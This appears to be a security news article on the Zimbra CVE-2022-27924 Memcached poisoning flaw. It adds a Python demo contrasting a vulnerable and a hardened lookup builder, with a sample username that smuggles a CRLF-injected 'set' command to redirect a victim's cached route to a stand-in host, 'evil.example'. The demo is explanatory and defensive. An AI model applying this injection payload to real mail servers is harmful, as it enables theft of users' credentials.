Technical details have emerged on a high-severity vulnerability affecting certain versions of the Zimbra Collaboration Suite email server. An unauthenticated attacker could exploit this bug to steal account credentials without any user interaction.
The issue is tracked as CVE-2022-27924 and affects Zimbra releases 8.8.x and 9.x, in both the open-source and the commercial editions of the platform.
Zimbra has published a fix in ZCS 9.0.0 Patch 24.1 and ZCS 8.8.15 Patch 31.1, available since May 10, 2022. Zimbra software is used by organisations worldwide, including government, financial, industrial and educational bodies.
The flaw was described in a report from researchers at SonarSource, who summarised it as “Memcached poisoning with an unauthenticated request.” Exploitation is possible through a CRLF injection into the username used in Memcached lookups.
Memcached is an internal caching service that stores key/value pairs (such as the backend route for a given email account) to improve Zimbra’s performance by reducing the number of HTTP requests to the Lookup Service. Memcached sets and retrieves those pairs using a simple line-based text protocol, so a username containing a carriage return and line feed terminates the intended lookup command, and whatever follows it in the username is parsed as additional commands, including one that overwrites a cached entry.
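The following Python is an added illustration of that mechanism and is not code from the SonarSource report or from Zimbra. It contains a tiny in-process emulator of the Memcached text protocol (get and set only), a vulnerable request builder that splices the username straight into the key, and a hardened builder that enforces Memcached's own key rules (at most 250 bytes, no whitespace or control characters). The key layout `route:user=<name>`, the host names and the sample "username" are constructed for the demo and are assumptions, not Zimbra's real cache layout.

```python
import re

# Hypothetical key layout for a cached route entry; Zimbra's real key
# format is not shown in the article, so this is an assumption.
KEY_PREFIX = "route:user="


def build_lookup(username: str) -> bytes:
    """Vulnerable: the username is spliced into the Memcached text command
    without validation, so a CRLF inside it ends the 'get' line and the
    remainder is parsed as further commands."""
    return f"get {KEY_PREFIX}{username}\r\n".encode()


# Memcached key rules: max 250 bytes, no whitespace or control characters.
_BAD_KEY_BYTE = re.compile(rb"[\x00-\x20\x7f]")


def build_lookup_safe(username: str) -> bytes:
    """Hardened: refuse any username that could not be a valid key."""
    raw = username.encode()
    if not raw or len(raw) > 250 or _BAD_KEY_BYTE.search(raw):
        raise ValueError("username is not a valid Memcached key")
    return b"get " + KEY_PREFIX.encode() + raw + b"\r\n"


def memcached_execute(store: dict, raw: bytes) -> list:
    """Minimal emulator of the Memcached text protocol (get/set only),
    enough to show how a request stream is split into commands."""
    out, pos = [], 0
    while pos < len(raw):
        end = raw.find(b"\r\n", pos)
        if end == -1:
            out.append(b"ERROR\r\n")
            break
        parts = raw[pos:end].split()
        pos = end + 2
        if not parts:
            continue
        if parts[0] == b"get":
            for key in parts[1:]:
                if key in store:
                    value = store[key]
                    out.append(b"VALUE %s 0 %d\r\n%s\r\n" % (key, len(value), value))
            out.append(b"END\r\n")
        elif parts[0] == b"set" and len(parts) == 5:
            key, nbytes = parts[1], int(parts[4])
            store[key] = raw[pos:pos + nbytes]
            pos += nbytes + 2          # data block plus its trailing CRLF
            out.append(b"STORED\r\n")
        else:
            out.append(b"ERROR\r\n")
    return out


# Constructed sample: a malicious "username" carrying an injected 'set'
# that overwrites the cached route of another account.
ROGUE_ROUTE = b"evil.example:143"
POISON_USERNAME = ("attacker\r\nset " + KEY_PREFIX + "victim 0 0 "
                   + str(len(ROGUE_ROUTE)) + "\r\n" + ROGUE_ROUTE.decode())


def fresh_store() -> dict:
    """Cache state before the attack (constructed sample data)."""
    return {KEY_PREFIX.encode() + b"victim": b"mailbox1.internal:143"}


def poison_demo() -> bytes:
    """Run the rogue username through the vulnerable builder and return
    the route the cache now holds for the victim."""
    store = fresh_store()
    memcached_execute(store, build_lookup(POISON_USERNAME))
    return store[KEY_PREFIX.encode() + b"victim"]


def safe_demo() -> bytes:
    """Same rogue username through the hardened builder: it is rejected
    before any Memcached traffic is produced, so the cache is untouched."""
    store = fresh_store()
    try:
        memcached_execute(store, build_lookup_safe(POISON_USERNAME))
    except ValueError:
        pass
    return store[KEY_PREFIX.encode() + b"victim"]


if __name__ == "__main__":
    print("vulnerable builder ->", poison_demo())   # b'evil.example:143'
    print("hardened builder   ->", safe_demo())     # b'mailbox1.internal:143'
```

The single `get` request built from the rogue username is tokenised by the cache into two commands, and the second one replaces the victim's route; validating the username against the key grammar before it ever reaches the cache closes that path regardless of what the rest of the protocol allows.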
SonarSource has shared a YouTube video demonstrating exploitation of the vulnerability.
The researchers explain that when a mail client restarts or needs to reconnect, which happens periodically, it re-authenticates to the targeted Zimbra instance. If the cached entry for that account has been poisoned so that the proxy forwards the connection to a server chosen by the attacker, those credentials are handed to the attacker in clear text.
The Kaduu Team urges you to update Zimbra if you run this mail server.